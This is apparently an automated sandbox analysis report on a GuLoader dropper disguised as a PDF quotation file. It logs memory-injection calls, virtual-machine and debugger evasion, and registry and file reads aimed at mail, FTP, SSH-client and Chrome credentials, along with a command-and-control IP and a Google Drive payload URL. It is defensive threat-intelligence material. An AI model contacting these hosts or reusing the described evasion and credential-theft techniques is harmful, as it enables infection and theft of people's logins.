      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B7B41 NtWriteVirtualMemory,0_2_020B7B41
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B7B59 NtWriteVirtualMemory,0_2_020B7B59
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B7B65 NtWriteVirtualMemory,0_2_020B7B65
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B7BBD NtWriteVirtualMemory,0_2_020B7BBD
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B7BC9 NtWriteVirtualMemory,0_2_020B7BC9
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B7BD5 NtWriteVirtualMemory,0_2_020B7BD5
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B7BE1 NtWriteVirtualMemory,0_2_020B7BE1
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B782D NtWriteVirtualMemory,0_2_020B782D
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B887D NtWriteVirtualMemory,0_2_020B887D
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B7880 NtWriteVirtualMemory,0_2_020B7880
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B7899 NtWriteVirtualMemory,0_2_020B7899
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B78A5 NtWriteVirtualMemory,0_2_020B78A5
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B7915 NtWriteVirtualMemory,0_2_020B7915
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B792D NtWriteVirtualMemory,0_2_020B792D
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B7921 NtWriteVirtualMemory,0_2_020B7921
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B799D NtWriteVirtualMemory,0_2_020B799D
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B7991 NtWriteVirtualMemory,0_2_020B7991
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B79A9 NtWriteVirtualMemory,0_2_020B79A9
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B7E40 NtWriteVirtualMemory,0_2_020B7E40
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B7E47 NtWriteVirtualMemory,0_2_020B7E47
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B7E59 NtWriteVirtualMemory,0_2_020B7E59
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B7E65 NtWriteVirtualMemory,0_2_020B7E65
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B7E79 NtWriteVirtualMemory,0_2_020B7E79
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B7EC2 NtWriteVirtualMemory,0_2_020B7EC2
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B7F3D NtWriteVirtualMemory,0_2_020B7F3D
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B7F31 NtWriteVirtualMemory,0_2_020B7F31
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B7F81 NtWriteVirtualMemory,0_2_020B7F81
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B7FA5 NtWriteVirtualMemory,0_2_020B7FA5
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B7C3D NtWriteVirtualMemory,0_2_020B7C3D
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B7C31 NtWriteVirtualMemory,0_2_020B7C31
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B7C7A NtWriteVirtualMemory,0_2_020B7C7A
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B7C85 NtWriteVirtualMemory,0_2_020B7C85
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B7CA9 NtWriteVirtualMemory,0_2_020B7CA9
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B8CFB NtWriteVirtualMemory,0_2_020B8CFB
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B7D25 NtWriteVirtualMemory,0_2_020B7D25
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B7D31 NtWriteVirtualMemory,0_2_020B7D31
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 8_2_0056FD07 LdrInitializeThunk,NtProtectVirtualMemory,8_2_0056FD07
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 8_2_0056FEC2 Sleep,LdrInitializeThunk,NtProtectVirtualMemory,8_2_0056FEC2
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 8_2_0056FD59 NtProtectVirtualMemory,8_2_0056FD59
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 8_2_0056FD4D NtProtectVirtualMemory,8_2_0056FD4D
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 8_2_0056FF79 NtProtectVirtualMemory,8_2_0056FF79
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 8_2_0056FE11 NtProtectVirtualMemory,8_2_0056FE11
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 8_2_0056FD00 LdrInitializeThunk,NtProtectVirtualMemory,8_2_0056FD00
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 8_2_0056FF09 NtProtectVirtualMemory,8_2_0056FF09
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 8_2_0056FD30 NtProtectVirtualMemory,8_2_0056FD30
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 8_2_0056FC21 LdrInitializeThunk,NtProtectVirtualMemory,8_2_0056FC21
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 8_2_0056FC96 LdrInitializeThunk,NtProtectVirtualMemory,8_2_0056FC96
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 8_2_0056FD9D NtProtectVirtualMemory,8_2_0056FD9D
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 8_2_0056FE85 NtProtectVirtualMemory,8_2_0056FE85
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 8_2_0056FDB5 NtProtectVirtualMemory,8_2_0056FDB5
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 8_2_0056FCB9 NtProtectVirtualMemory,8_2_0056FCB9
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 8_2_0056FCA1 LdrInitializeThunk,NtProtectVirtualMemory,8_2_0056FCA1
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 8_2_0056FCAD LdrInitializeThunk,NtProtectVirtualMemory,8_2_0056FCAD
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 8_2_0056FEAD LdrInitializeThunk,NtProtectVirtualMemory,8_2_0056FEAD
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Process Stats: CPU usage > 98%
      Source: RFQ 001030112021#U00b7pdf.exe, 00000000.00000000.670357074.000000000041C000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameForm_Fejlfunkt.exe vs RFQ 001030112021#U00b7pdf.exe
      Source: RFQ 001030112021#U00b7pdf.exe, 00000000.00000002.770681442.0000000002960000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameForm_Fejlfunkt.exeFE2X vs RFQ 001030112021#U00b7pdf.exe
      Source: RFQ 001030112021#U00b7pdf.exe, 00000008.00000000.769293326.000000000041C000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameForm_Fejlfunkt.exe vs RFQ 001030112021#U00b7pdf.exe
      Source: RFQ 001030112021#U00b7pdf.exe Binary or memory string: OriginalFilenameForm_Fejlfunkt.exe vs RFQ 001030112021#U00b7pdf.exe
      Source: RFQ 001030112021#U00b7pdf.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: RFQ 001030112021#U00b7pdf.exe Static PE information: invalid certificate
      Source: RFQ 001030112021#U00b7pdf.exe Metadefender: Detection: 17%
      Source: RFQ 001030112021#U00b7pdf.exe ReversingLabs: Detection: 17%
      Source: RFQ 001030112021#U00b7pdf.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
      Source: unknown Process created: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe "C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe"
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Process created: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe "C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe"
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Process created: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe "C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe"
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Crypto
      Source: classification engine Classification label: mal100.rans.troj.spyw.evad.winEXE@3/2@2/3
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Mutant created: \Sessions\1\BaseNamedObjects\8F9C4E9C79A3B52B3F739430
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe File read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook

      Data Obfuscation:

      Yara detected GuLoader
      Source: Yara match File source: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara match File source: 00000008.00000000.770261395.0000000000560000.00000040.00000001.sdmp, type: MEMORY
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_0040264C push 0040130Eh; ret 0_2_0040265F
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_00402660 push 0040130Eh; ret 0_2_00402673
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe; Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe; Process information set: NOGPFAULTERRORBOX

      Malware Analysis System Evasion:

      Tries to detect Any.run
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe; File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe; File opened: C:\Program Files\qga\qga.exe
      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
      Source: RFQ 001030112021#U00b7pdf.exe, 00000008.00000002.892261911.0000000002420000.00000004.00000001.sdmp; Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=HTTPS://DRIVE.GOOGLE.COM/UC?EXPORT=DOWNLOAD&ID=1F5UP5O0CFHZV_GAVQKAQAHPOSXGGLGCB
      Source: RFQ 001030112021#U00b7pdf.exe, 00000000.00000002.770672587.00000000028C0000.00000004.00000001.sdmp, RFQ 001030112021#U00b7pdf.exe, 00000008.00000002.892261911.0000000002420000.00000004.00000001.sdmp; Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
      Source: RFQ 001030112021#U00b7pdf.exe, 00000000.00000002.770672587.00000000028C0000.00000004.00000001.sdmp; Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSVBVM60.DLL
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe TID: 2832; Thread sleep count: 678 > 30
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe TID: 4564; Thread sleep time: -60000s >= -30000s
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe; Last function: Thread delayed
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe; Window / User API: threadDelayed 678
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe; Thread delayed: delay time: 60000
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe; System information queried: ModuleInformation
      Source: RFQ 001030112021#U00b7pdf.exe, 00000000.00000002.770756711.0000000002B6A000.00000004.00000001.sdmp, RFQ 001030112021#U00b7pdf.exe, 00000008.00000002.892290801.000000000262A000.00000004.00000001.sdmp; Binary or memory string: Hyper-V Guest Shutdown Service
      Source: RFQ 001030112021#U00b7pdf.exe, 00000000.00000002.770672587.00000000028C0000.00000004.00000001.sdmp; Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=windir=\syswow64\msvbvm60.dll
      Source: RFQ 001030112021#U00b7pdf.exe, 00000008.00000002.895483253.000000001E728000.00000004.00000001.sdmp, RFQ 001030112021#U00b7pdf.exe, 00000008.00000002.892164333.00000000009D7000.00000004.00000020.sdmp; Binary or memory string: Hyper-V RAWV
      Source: RFQ 001030112021#U00b7pdf.exe, 00000000.00000002.770756711.0000000002B6A000.00000004.00000001.sdmp, RFQ 001030112021#U00b7pdf.exe, 00000008.00000002.892290801.000000000262A000.00000004.00000001.sdmp; Binary or memory string: Hyper-V Remote Desktop Virtualization Service
      Source: RFQ 001030112021#U00b7pdf.exe, 00000008.00000002.892290801.000000000262A000.00000004.00000001.sdmp; Binary or memory string: vmicshutdown
      Source: RFQ 001030112021#U00b7pdf.exe, 00000000.00000002.770756711.0000000002B6A000.00000004.00000001.sdmp, RFQ 001030112021#U00b7pdf.exe, 00000008.00000002.892290801.000000000262A000.00000004.00000001.sdmp; Binary or memory string: Hyper-V Volume Shadow Copy Requestor
      Source: RFQ 001030112021#U00b7pdf.exe, 00000000.00000002.770756711.0000000002B6A000.00000004.00000001.sdmp, RFQ 001030112021#U00b7pdf.exe, 00000008.00000002.892290801.000000000262A000.00000004.00000001.sdmp; Binary or memory string: Hyper-V PowerShell Direct Service
      Source: RFQ 001030112021#U00b7pdf.exe, 00000000.00000002.770756711.0000000002B6A000.00000004.00000001.sdmp, RFQ 001030112021#U00b7pdf.exe, 00000008.00000002.892290801.000000000262A000.00000004.00000001.sdmp; Binary or memory string: Hyper-V Time Synchronization Service
      Source: RFQ 001030112021#U00b7pdf.exe, 00000008.00000002.892290801.000000000262A000.00000004.00000001.sdmp; Binary or memory string: vmicvss
      Source: RFQ 001030112021#U00b7pdf.exe, 00000008.00000002.895453741.000000001E6F8000.00000004.00000001.sdmp, RFQ 001030112021#U00b7pdf.exe, 00000008.00000002.895483253.000000001E728000.00000004.00000001.sdmp, RFQ 001030112021#U00b7pdf.exe, 00000008.00000002.892121972.0000000000987000.00000004.00000020.sdmp, RFQ 001030112021#U00b7pdf.exe, 00000008.00000002.892164333.00000000009D7000.00000004.00000020.sdmp; Binary or memory string: Hyper-V RAW
      Source: RFQ 001030112021#U00b7pdf.exe, 00000000.00000002.770672587.00000000028C0000.00000004.00000001.sdmp, RFQ 001030112021#U00b7pdf.exe, 00000008.00000002.892261911.0000000002420000.00000004.00000001.sdmp; Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
      Source: RFQ 001030112021#U00b7pdf.exe, 00000000.00000002.770756711.0000000002B6A000.00000004.00000001.sdmp, RFQ 001030112021#U00b7pdf.exe, 00000008.00000002.892290801.000000000262A000.00000004.00000001.sdmp; Binary or memory string: Hyper-V Data Exchange Service
      Source: RFQ 001030112021#U00b7pdf.exe, 00000000.00000002.770756711.0000000002B6A000.00000004.00000001.sdmp, RFQ 001030112021#U00b7pdf.exe, 00000008.00000002.892290801.000000000262A000.00000004.00000001.sdmp; Binary or memory string: Hyper-V Heartbeat Service
      Source: RFQ 001030112021#U00b7pdf.exe, 00000000.00000002.770756711.0000000002B6A000.00000004.00000001.sdmp, RFQ 001030112021#U00b7pdf.exe, 00000008.00000002.892290801.000000000262A000.00000004.00000001.sdmp; Binary or memory string: Hyper-V Guest Service Interface
      Source: RFQ 001030112021#U00b7pdf.exe, 00000008.00000002.892290801.000000000262A000.00000004.00000001.sdmp; Binary or memory string: vmicheartbeat
      Source: RFQ 001030112021#U00b7pdf.exe, 00000008.00000002.892261911.0000000002420000.00000004.00000001.sdmp; Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=https://drive.google.com/uc?export=download&id=1f5uP5o0CfHZv_GAVqkAqahPOSxgGlgCb

      Anti Debugging:

      Hides threads from debuggers
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe; Thread information set: HideFromDebugger
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe; Process token adjusted: Debug
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe; Code function: 0_2_020BC7BF mov eax, dword ptr fs:[00000030h] 0_2_020BC7BF
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe; Code function: 0_2_020BBAA1 mov eax, dword ptr fs:[00000030h] 0_2_020BBAA1
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe; Code function: 0_2_020BDB82 mov eax, dword ptr fs:[00000030h] 0_2_020BDB82
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe; Code function: 0_2_020BD872 mov eax, dword ptr fs:[00000030h] 0_2_020BD872
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe; Code function: 0_2_020B8F54 mov eax, dword ptr fs:[00000030h] 0_2_020B8F54
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe; Code function: 0_2_020BA6B9 LdrInitializeThunk, 0_2_020BA6B9
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe; Process created: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe "C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe"
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

      Stealing of Sensitive Information:

      GuLoader behavior detected
      Source: Initial file; Signature Results: GuLoader behavior
      Tries to steal Mail credentials (via file / registry access)
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe; Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe; Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
      Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe; Key opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe; Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl
      Tries to harvest and steal ftp login credentials
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe; File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe; File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe; File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts
      Tries to harvest and steal browser information (history, passwords, etc)
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

      Mitre Att&ck Matrix

      Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
      Valid Accounts | Windows Management Instrumentation | Path Interception | Process Injection 11 | Masquerading 1 | OS Credential Dumping 2 | Security Software Discovery 31 | Remote Services | Email Collection 1 | Exfiltration Over Other Network Medium | Encrypted Channel 11 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
      Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Virtualization/Sandbox Evasion 211 | Credentials in Registry 1 | Virtualization/Sandbox Evasion 211 | Remote Desktop Protocol | Archive Collected Data 1 | Exfiltration Over Bluetooth | Ingress Tool Transfer 3 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
      Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Process Injection 11 | Security Account Manager | Application Window Discovery 1 | SMB/Windows Admin Shares | Data from Local System 2 | Automated Exfiltration | Non-Application Layer Protocol 4 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
      Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Obfuscated Files or Information 1 | NTDS | Remote System Discovery 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 115 | SIM Card Swap | | Carrier Billing Fraud
      Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Software Packing 1 | LSA Secrets | System Information Discovery 4 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      Source | Detection | Scanner | Label
      RFQ 001030112021#U00b7pdf.exe | 17% | Metadefender |
      RFQ 001030112021#U00b7pdf.exe | 18% | ReversingLabs | Win32.Backdoor.Androm

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      Source | Detection | Scanner | Label
      0.2.RFQ 001030112021#U00b7pdf.exe.400000.0.unpack | 100% | Avira | TR/Dropper.VB.Gen
      0.0.RFQ 001030112021#U00b7pdf.exe.400000.0.unpack | 100% | Avira | TR/Dropper.VB.Gen
      8.0.RFQ 001030112021#U00b7pdf.exe.400000.0.unpack | 100% | Avira | TR/Dropper.VB.Gen
      8.0.RFQ 001030112021#U00b7pdf.exe.400000.2.unpack | 100% | Avira | TR/Dropper.VB.Gen
      8.0.RFQ 001030112021#U00b7pdf.exe.400000.1.unpack | 100% | Avira | TR/Dropper.VB.Gen
      8.0.RFQ 001030112021#U00b7pdf.exe.400000.3.unpack | 100% | Avira | TR/Dropper.VB.Gen

      Domains

      No Antivirus matches

      URLs

      Source | Detection | Scanner | Label
      http://63.250.34.171/tickets.php?id=277N | 0% | Avira URL Cloud | safe
      http://63.250.34.171/tickets.php?id=277 | 9% | Virustotal |
      http://63.250.34.171/tickets.php?id=277 | 0% | Avira URL Cloud | safe
      https://csp.withgoogle.com/csp/report-to/gse_l9ocaq | 0% | Avira URL Cloud | safe

      Domains and IPs

      Contacted Domains

      Name | IP | Active | Malicious | Antivirus Detection | Reputation
      drive.google.com | 142.250.180.110 | true | false | | high
      googlehosted.l.googleusercontent.com | 216.58.198.33 | true | false | | high
      doc-00-50-docs.googleusercontent.com | unknown | unknown | false | | high

            Contacted URLs

            Name | Malicious | Antivirus Detection | Reputation
            http://63.250.34.171/tickets.php?id=277 | true | 9%, Virustotal; Avira URL Cloud: safe | unknown
            https://doc-00-50-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/tmgkbuuoqg7e2eb3u8b2c66mt8m0nijc/1638356250000/03026244708369606156/*/1f5uP5o0CfHZv_GAVqkAqahPOSxgGlgCb?e=download | false | | high

              URLs from Memory and Binaries

              Name | Source | Malicious | Antivirus Detection | Reputation
              https://doc-00-50-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/tmgkbuuo | RFQ 001030112021#U00b7pdf.exe, 00000008.00000003.858257850.00000000009F2000.00000004.00000001.sdmp, RFQ 001030112021#U00b7pdf.exe, 00000008.00000003.857244757.00000000009EB000.00000004.00000001.sdmp, RFQ 001030112021#U00b7pdf.exe, 00000008.00000002.895501429.000000001E743000.00000004.00000001.sdmp | false | | high
              http://63.250.34.171/tickets.php?id=277N | RFQ 001030112021#U00b7pdf.exe, 00000008.00000002.892182668.00000000009F2000.00000004.00000020.sdmp, RFQ 001030112021#U00b7pdf.exe, 00000008.00000002.895501429.000000001E743000.00000004.00000001.sdmp | true | Avira URL Cloud: safe | unknown
              https://doc-00-50-docs.googleusercontent.com/t | RFQ 001030112021#U00b7pdf.exe, 00000008.00000003.857351180.0000000000A33000.00000004.00000001.sdmp, RFQ 001030112021#U00b7pdf.exe, 00000008.00000003.857252328.00000000009F2000.00000004.00000001.sdmp, RFQ 001030112021#U00b7pdf.exe, 00000008.00000003.858257850.00000000009F2000.00000004.00000001.sdmp | false | | high
              https://drive.google.com/ | RFQ 001030112021#U00b7pdf.exe, 00000008.00000002.895453741.000000001E6F8000.00000004.00000001.sdmp, RFQ 001030112021#U00b7pdf.exe, 00000008.00000002.892121972.0000000000987000.00000004.00000020.sdmp | false | | high
              https://doc-00-50-docs.googleusercontent.com/p | RFQ 001030112021#U00b7pdf.exe, 00000008.00000003.857351180.0000000000A33000.00000004.00000001.sdmp, RFQ 001030112021#U00b7pdf.exe, 00000008.00000003.857252328.00000000009F2000.00000004.00000001.sdmp, RFQ 001030112021#U00b7pdf.exe, 00000008.00000003.858257850.00000000009F2000.00000004.00000001.sdmp | false | | high
              https://doc-00-50-docs.googleusercontent.com/: | RFQ 001030112021#U00b7pdf.exe, 00000008.00000002.892182668.00000000009F2000.00000004.00000020.sdmp, RFQ 001030112021#U00b7pdf.exe, 00000008.00000003.858257850.00000000009F2000.00000004.00000001.sdmp, RFQ 001030112021#U00b7pdf.exe, 00000008.00000002.895501429.000000001E743000.00000004.00000001.sdmp | false | | high
              https://doc-00-50-docs.googleusercontent.com/ | RFQ 001030112021#U00b7pdf.exe, 00000008.00000003.858257850.00000000009F2000.00000004.00000001.sdmp | false | | high
              https://doc-00-50-docs.googleusercontent.com/) | RFQ 001030112021#U00b7pdf.exe, 00000008.00000002.892182668.00000000009F2000.00000004.00000020.sdmp, RFQ 001030112021#U00b7pdf.exe, 00000008.00000003.858257850.00000000009F2000.00000004.00000001.sdmp, RFQ 001030112021#U00b7pdf.exe, 00000008.00000002.895501429.000000001E743000.00000004.00000001.sdmp | false | | high
              https://csp.withgoogle.com/csp/report-to/gse_l9ocaq | RFQ 001030112021#U00b7pdf.exe, 00000008.00000003.857252328.00000000009F2000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown

                            Contacted IPs

                            Public

                            IP | Domain | Country | ASN | ASN Name | Malicious
                            63.250.34.171 | unknown | United States | 22612 | NAMECHEAP-NETUS | true
                            216.58.198.33 | googlehosted.l.googleusercontent.com | United States | 15169 | GOOGLEUS | false
                            142.250.180.110 | drive.google.com | United States | 15169 | GOOGLEUS | false

                            General Information

